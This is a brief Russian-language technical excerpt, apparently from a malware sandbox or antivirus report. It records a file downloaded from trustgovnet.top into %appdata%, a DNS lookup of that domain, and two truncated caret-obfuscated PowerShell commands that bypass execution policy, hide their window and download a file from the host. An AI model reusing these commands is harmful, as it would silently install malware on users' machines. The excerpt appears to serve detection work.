Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^eR^sHElL.^e^x^E -ex^ec^uT^ion^POL^I^cy ByPA^ss -n^O^PROf^Ile -wINd^OwstyLe ^H^id^DEn (N^EW^-ObJ^eCT SY^stEm^.^Ne^T.^WebcL^I^E^nt).DoWnl^oa^DFiLe('http://trustgovnet.top/se...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /C "P^O^w^eR^sHElL.^e^x^E -ex^ec^uT^ion^POL^I^cy ByPA^ss -n^O^PROf^Ile -wINd^OwstyLe ^H^id^DEn (N^EW^-ObJ^eCT SY^stEm^.^Ne^T.^WebcL^I^E^nt).DoWnl^oa^DFiLe('http://trustgovnet.top/se...' (со скрытым окном)